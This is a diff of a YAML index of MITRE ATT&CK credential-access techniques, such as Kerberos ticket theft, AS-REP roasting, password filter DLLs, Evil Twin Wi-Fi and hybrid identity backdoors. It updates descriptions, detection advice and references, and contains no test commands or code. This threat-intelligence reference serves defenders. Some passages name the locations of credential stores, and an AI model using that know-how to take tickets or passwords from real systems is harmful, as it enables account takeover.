-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
-      type: attack-pattern
-      created: '2020-02-11T19:05:45.829Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.002
-        url: https://attack.mitre.org/techniques/T1556/002
-      - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
-        description: Fuller, R. (2013, September 11). Stealing passwords every time
-          they change. Retrieved November 21, 2017.
-        source_name: Carnal Ownage Password Filters Sept 2013
-      - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
-        description: Bialek, J. (2013, September 15). Intercepting Password Changes
-          With Function Hooking. Retrieved November 21, 2017.
-        source_name: Clymb3r Function Hook Passwords Sept 2013
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-08-21T16:16:18.271Z'
       name: 'Modify Authentication Process: Password Filter DLL'
       description: "Adversaries may register malicious password filter dynamic link
         libraries (DLLs) into the authentication process to acquire user credentials
@@ -45044,76 +45664,129 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Vincent Le Toux
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages</code>) and correlate then investigate the DLL files these files reference.
 
         Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Creation'
       - 'Module: Module Load'
-      x_mitre_permissions_required:
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+      created: '2020-02-11T19:05:45.829Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/002
+        external_id: T1556.002
+      - source_name: Clymb3r Function Hook Passwords Sept 2013
+        description: Bialek, J. (2013, September 15). Intercepting Password Changes
+          With Function Hooking. Retrieved November 21, 2017.
+        url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+      - source_name: Carnal Ownage Password Filters Sept 2013
+        description: Fuller, R. (2013, September 11). Stealing passwords every time
+          they change. Retrieved November 21, 2017.
+        url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.002
     atomic_tests: []
-  T1558.004:
-    technique:
-      x_mitre_platforms:
-      - Windows
+  T1558.005:
+    technique:
+      modified: '2024-10-14T21:26:37.856Z'
+      name: Ccache Files
+      description: "\nAdversaries may attempt to steal Kerberos tickets stored in
+        credential cache files (or ccache). These files are used for short term storage
+        of a user's active session credentials. The ccache file is created upon user
+        authentication and allows for access to multiple services without the user
+        having to re-enter credentials. \n\nThe <code>/etc/krb5.conf</code> configuration
+        file and the <code>KRB5CCNAME</code> environment variable are used to set
+        the storage location for ccache entries. On Linux, credentials are typically
+        stored in the `/tmp` directory with a naming format of `krb5cc_%UID%` or `krb5.ccache`.
+        On macOS, ccache entries are stored by default in memory with an `API:{uuid}`
+        naming scheme. Typically, users interact with ticket storage using <code>kinit</code>,
+        which obtains a Ticket-Granting-Ticket (TGT) for the principal; <code>klist</code>,
+        which lists obtained tickets currently held in the credentials cache; and
+        other built-in binaries.(Citation: Kerberos GNU/Linux)(Citation: Binary Defense
+        Kerberos Linux)\n\nAdversaries can collect tickets from ccache files stored
+        on disk and authenticate as the current user without their password to perform
+        [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.
+        Adversaries can also use these tickets to impersonate legitimate users with
+        elevated privileges to perform [Privilege Escalation](https://attack.mitre.org/tactics/TA0004).
+        Tools like Kekeo can also be used by adversaries to convert ccache files to
+        Windows format for further [Lateral Movement](https://attack.mitre.org/tactics/TA0008).
+        On macOS, adversaries may use open-source tools or the Kerberos framework
+        to interact with ccache files and extract TGTs or Service Tickets via lower-level
+        APIs.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: Linux Kerberos
+        Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo) "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_contributors:
-      - Yossi Nisani, Cymptom
-      - James Dunn, @jamdunnDFW, EY
-      - Swapnil Kumbhar
-      - Jacques Pluviose, @Jacqueswildy_IT
-      - Dan Nutting, @KerberToast
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'File: File Access'
       type: attack-pattern
-      created: '2020-08-24T13:43:00.028Z'
+      id: attack-pattern--394220d9-8efc-4252-9040-664f7b115be6
+      created: '2024-09-17T15:02:31.324Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1558.004
-        url: https://attack.mitre.org/techniques/T1558/004
-      - source_name: Harmj0y Roasting AS-REPs Jan 2017
-        url: http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/
-        description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved August
-          24, 2020.
-      - source_name: Microsoft Kerberos Preauth 2014
-        url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
-        description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
-          It Should Not Be Disabled. Retrieved August 25, 2020.'
-      - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
-        url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
-        description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
-          with AS-REP Roasting. Retrieved August 24, 2020.
-      - description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
-          Guard Dog of Hades. Retrieved March 22, 2018.
-        source_name: SANS Attacking Kerberos Nov 2014
-        url: https://redsiege.com/kerberoast-slides
-      - url: https://adsecurity.org/?p=2293
-        description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
-          Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
-          Domain. Retrieved March 22, 2018.
-        source_name: AdSecurity Cracking Kerberos Dec 2015
-      - url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
-        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
-          using Azure Security Center. Retrieved March 23, 2018.
-        source_name: Microsoft Detecting Kerberoasting Feb 2018
-      - source_name: Microsoft 4768 TGT 2017
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
-        description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
-          ticket (TGT) was requested. Retrieved August 24, 2020.'
-      modified: '2021-06-07T19:23:33.039Z'
+        url: https://attack.mitre.org/techniques/T1558/005
+        external_id: T1558.005
+      - source_name: Binary Defense Kerberos Linux
+        description: " ARC Labs, Dwyer, John. Gonzalez, Eric. Hudak, Tyler. (2024,
+          October 1). Shining a Light in the Dark – How Binary Defense Uncovered an
+          APT Lurking in Shadows of IT. Retrieved October 7, 2024."
+        url: https://www.binarydefense.com/resources/blog/shining-a-light-in-the-dark-how-binary-defense-uncovered-an-apt-lurking-in-shadows-of-it/
+      - source_name: Kerberos GNU/Linux
+        description: Adepts of 0xCC. (2021, January 28). The Kerberos Credential Thievery
+          Compendium (GNU/Linux). Retrieved September 17, 2024.
+        url: https://adepts.of0x.cc/kerberos-thievery-linux/
+      - source_name: Kekeo
+        description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
+        url: https://github.com/gentilkiwi/kekeo
+      - source_name: SpectorOps Bifrost Kerberos macOS 2019
+        description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
+          Retrieved October 6, 2021.
+        url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
+      - source_name: Brining MimiKatz to Unix
+        description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
+          Mimikatz et al to UNIX. Retrieved October 13, 2021.
+        url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
+      - source_name: Linux Kerberos Tickets
+        description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
+          Teams. Retrieved October 4, 2021.
+        url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1558.004:
+    technique:
+      modified: '2024-10-15T15:32:07.850Z'
       name: 'Steal or Forge Kerberos Tickets: AS-REP Roasting'
       description: "Adversaries may reveal credentials of accounts that have disabled
         Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002)
@@ -45148,6 +45821,13 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Yossi Nisani, Cymptom
+      - James Dunn, @jamdunnDFW, EY
+      - Swapnil Kumbhar
+      - Jacques Pluviose, @Jacqueswildy_IT
+      - Dan Nutting, @KerberToast
+      x_mitre_deprecated: false
       x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
         TGS service ticket requests. Particularly investigate irregular patterns of
         activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within
@@ -45155,32 +45835,68 @@ credential-access:
         pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking
         Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation:
         Microsoft 4768 TGT 2017)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Credential Request'
-      x_mitre_permissions_required:
-      - User
       x_mitre_system_requirements:
       - Valid domain account
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+      created: '2020-08-24T13:43:00.028Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1558/004
+        external_id: T1558.004
+      - source_name: Microsoft Detecting Kerberoasting Feb 2018
+        description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+          using Azure Security Center. Retrieved March 23, 2018.
+        url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
+      - source_name: Harmj0y Roasting AS-REPs Jan 2017
+        description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved September
+          23, 2024.
+        url: https://blog.harmj0y.net/activedirectory/roasting-as-reps/
+      - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
+        description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
+          with AS-REP Roasting. Retrieved August 24, 2020.
+        url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
+      - source_name: SANS Attacking Kerberos Nov 2014
+        description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+          Guard Dog of Hades. Retrieved March 22, 2018.
+        url: https://redsiege.com/kerberoast-slides
+      - source_name: AdSecurity Cracking Kerberos Dec 2015
+        description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
+          Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
+          Domain. Retrieved March 22, 2018.
+        url: https://adsecurity.org/?p=2293
+      - source_name: Microsoft 4768 TGT 2017
+        description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
+          ticket (TGT) was requested. Retrieved August 24, 2020.'
+        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
+      - source_name: Microsoft Kerberos Preauth 2014
+        description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
+          It Should Not Be Disabled. Retrieved August 25, 2020.'
+        url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1558.004
     atomic_tests: []
   T1558:
     technique:
-      modified: '2024-03-01T16:58:02.395Z'
+      modified: '2024-09-17T19:49:11.455Z'
       name: Steal or Forge Kerberos Tickets
       description: |
         Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting.  Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.
 
         On Windows, the built-in <code>klist</code> utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)
-
-        Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in <code>/var/lib/sss/secrets/secrets.ldb</code> as well as the corresponding key located in <code>/var/lib/sss/secrets/.secrets.mkey</code>. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)
-
-
-        Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the <code>/etc/krb5.conf</code> configuration file and the <code>KRB5CCNAME</code> environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using <code>kinit</code>, <code>klist</code>, <code>ktutil</code>, and <code>kcc</code> built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
@@ -45216,7 +45932,7 @@ credential-access:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Logon Session: Logon Session Metadata'
@@ -45241,13 +45957,6 @@ credential-access:
         description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
           using Azure Security Center. Retrieved March 23, 2018.
         url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
-      - source_name: Kekeo
-        description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
-        url: https://github.com/gentilkiwi/kekeo
-      - source_name: SpectorOps Bifrost Kerberos macOS 2019
-        description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
-          Retrieved October 6, 2021.
-        url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
       - source_name: Medium Detecting Attempts to Steal Passwords from Memory
         description: French, D. (2018, October 2). Detecting Attempts to Steal Passwords
           from Memory. Retrieved October 11, 2019.
@@ -45256,14 +45965,6 @@ credential-access:
         description: Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket
           Attacks. Retrieved February 27, 2020.
         url: https://blog.stealthbits.com/detect-pass-the-ticket-attacks
-      - source_name: macOS kerberos framework MIT
-        description: Massachusetts Institute of Technology. (2007, October 27). Kerberos
-          for Macintosh Preferences Documentation. Retrieved October 6, 2021.
-        url: http://web.mit.edu/macdev/KfM/Common/Documentation/preferences.html
-      - source_name: MIT ccache
-        description: 'Massachusetts Institute of Technology. (n.d.). MIT Kerberos
-          Documentation: Credential Cache. Retrieved October 4, 2021.'
-        url: https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html
       - source_name: AdSecurity Cracking Kerberos Dec 2015
         description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
           Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
@@ -45285,23 +45986,14 @@ credential-access:
         description: Sean Metcalf. (2014, September 12). Kerberos, Active Directory’s
           Secret Decoder Ring. Retrieved February 27, 2020.
         url: https://adsecurity.org/?p=227
-      - source_name: Brining MimiKatz to Unix
-        description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
-          Mimikatz et al to UNIX. Retrieved October 13, 2021.
-        url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
-      - source_name: Linux Kerberos Tickets
-        description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
-          Teams. Retrieved October 4, 2021.
-        url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1555:
     technique:
-      modified: '2024-02-26T14:19:09.417Z'
+      modified: '2024-10-15T14:57:46.850Z'
       name: Credentials from Password Stores
       description: 'Adversaries may search for common password storage locations to
         obtain user credentials.(Citation: F-Secure The Dukes) Passwords are stored
@@ -45352,12 +46044,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1555
     atomic_tests: []
   T1552:
     technique:
-      modified: '2024-04-15T21:33:12.892Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Unsecured Credentials
       description: 'Adversaries may search compromised systems to find and obtain
         insecurely stored credentials. These credentials can be stored and/or misplaced
@@ -45369,6 +46060,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Austin Clark, @c2defense
       x_mitre_deprecated: false
@@ -45383,18 +46075,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Access'
       - 'Application Log: Application Log Content'
@@ -45417,37 +46109,115 @@ credential-access:
         url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      identifier: T1552
+    atomic_tests: []
+  T1557.004:
+    technique:
+      modified: '2024-11-11T18:52:53.686Z'
+      name: Evil Twin
+      description: "Adversaries may host seemingly genuine Wi-Fi access points to
+        deceive users into connecting to malicious networks as a way of supporting
+        follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+        [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+        or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+        ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+        network, fraudulent Wi-Fi access points may trick devices or users into connecting
+        to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+        evil twin)  Adversaries may provide a stronger signal strength or block access
+        to Wi-Fi access points to coerce or entice victim devices into connecting
+        to malicious networks.(Citation: specter ops evil twin)  A Wi-Fi Pineapple
+        – a network security auditing and penetration testing tool – may be deployed
+        in Evil Twin attacks for ease of use and broader range. Custom certificates
+        may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+        may also listen for client devices sending probe requests for known or previously
+        connected networks (Preferred Network Lists or PNLs). When a malicious access
+        point receives a probe request, adversaries can respond with the same SSID
+        to imitate the trusted, known network.(Citation: specter ops evil twin)  Victim
+        devices are led to believe the responding access point is from their PNL and
+        initiate a connection to the fraudulent network.\n\nUpon logging into the
+        malicious Wi-Fi access point, a user may be directed to a fake login page
+        or captive portal webpage to capture the victim’s credentials. Once a user
+        is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+        network activity, manipulate data, or steal additional credentials. Locations
+        with high concentrations of public Wi-Fi access, such as airports, coffee
+        shops, or libraries, may be targets for adversaries to set up illegitimate
+        Wi-Fi access points. "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Menachem Goldstein
+      - DeFord L. Smith
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Network Traffic: Network Traffic Content'
+      - 'Network Traffic: Network Traffic Flow'
+      type: attack-pattern
+      id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+      created: '2024-09-17T14:27:40.947Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1557/004
+        external_id: T1557.004
+      - source_name: Kaspersky evil twin
+        description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+          them. Retrieved September 17, 2024.
+        url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+      - source_name: medium evil twin
+        description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+          Attack. Retrieved September 17, 2024.
+        url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+      - source_name: specter ops evil twin
+        description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+          Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+          17, 2024.
+        url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+      - source_name: Australia ‘Evil Twin’
+        description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+          WiFi attack on plane. Retrieved September 17, 2024.
+        url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      identifier: T1552
     atomic_tests: []
   T1556.007:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Hybrid Identity
       description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
         processes that are tied to on-premises user identities in order to bypass
         typical authentication mechanisms, access credentials, and enable persistent
         access to accounts.  \n\nMany organizations maintain hybrid user and device
         identities that are shared between on-premises and cloud-based environments.
-        These can be maintained in a number of ways. For example, Azure AD includes
-        three options for synchronizing identities between Active Directory and Azure
-        AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+        These can be maintained in a number of ways. For example, Microsoft Entra
+        ID includes three options for synchronizing identities between Active Directory
+        and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
         (PHS), in which a privileged on-premises account synchronizes user password
-        hashes between Active Directory and Azure AD, allowing authentication to Azure
-        AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
-        in which Azure AD authentication attempts are forwarded to an on-premises
+        hashes between Active Directory and Entra ID, allowing authentication to Entra
+        ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+        in which Entra ID authentication attempts are forwarded to an on-premises
         PTA agent, which validates the credentials against Active Directory \n* Active
         Directory Federation Services (AD FS), in which a trust relationship is established
-        between Active Directory and Azure AD \n\nAD FS can also be used with other
+        between Active Directory and Entra ID \n\nAD FS can also be used with other
         SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
         process to AD FS and receive a token containing the hybrid users’ identity
         and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
         an adversary may be able to establish persistent privileged access to cloud
         resources. For example, adversaries who compromise an on-premises server running
         a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
-        process that authorizes all attempts to authenticate to Azure AD, as well
+        process that authorizes all attempts to authenticate to Entra ID, as well
         as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
         AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
         may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
@@ -45455,9 +46225,9 @@ credential-access:
         any set of claims, thereby bypassing multi-factor authentication and defined
         AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
         to modify the hybrid identity authentication process from the cloud. For example,
-        adversaries who compromise a Global Administrator account in an Azure AD tenant
+        adversaries who compromise a Global Administrator account in an Entra ID tenant
         may be able to register a new PTA agent via the web console, similarly allowing
-        them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+        them to harvest credentials and log into the Entra ID environment as any user.(Citation:
         Mandiant Azure AD Backdoors)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -45466,21 +46236,22 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
       - SaaS
-      - Google Workspace
-      - Office 365
       - IaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Praetorian
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -45520,55 +46291,10 @@ credential-access:
         url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1555.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Ryan Benson, Exabeam
-      - Barry Shteiman, Exabeam
-      - Sylvain Gil, Exabeam
-      - RedHuntLabs, @redhuntlabs
-      object_marking_refs:
